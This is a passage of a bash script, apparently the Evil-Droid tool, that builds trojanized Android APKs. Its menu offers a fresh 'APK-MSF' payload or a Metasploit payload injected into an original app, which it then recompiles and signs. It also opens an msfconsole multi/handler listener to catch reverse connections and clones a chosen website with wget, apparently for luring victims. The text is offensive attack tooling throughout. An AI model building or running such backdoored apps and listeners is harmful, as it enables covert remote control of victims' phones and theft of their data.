623 | echo "[✔] Done."
624 | spinlong
625 | if [ $rc != 0 ]; then
626 | echo -e $red ""
627 | echo "[!] Failed to align recompiled APK"
628 | apache_svc_stop
629 | postgresql_stop
630 | exit $rc
631 | fi
632 | rm evil.apk > /dev/null 2>&1
633 | }
634 | #function ask
635 | function quests()
636 | {
637 | while true; do
638 | echo ""
639 | quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
640 | case $quest in
641 | APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
642 | ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
643 | esac
644 | done
645 | }
646 | #function listeners
647 | function listener()
648 | {
649 | xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
650 | }
651 | #function clone site
652 | function clns()
653 | {
654 | clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
655 | }
656 | function index_name()
657 | {
658 | index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
659 | echo -e $yellow ""
660 | echo "[*] Clone Website From URL..."
661 | spinlong
662 | wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
663 | }
664 | function launcher()
665 | {
666 | echo '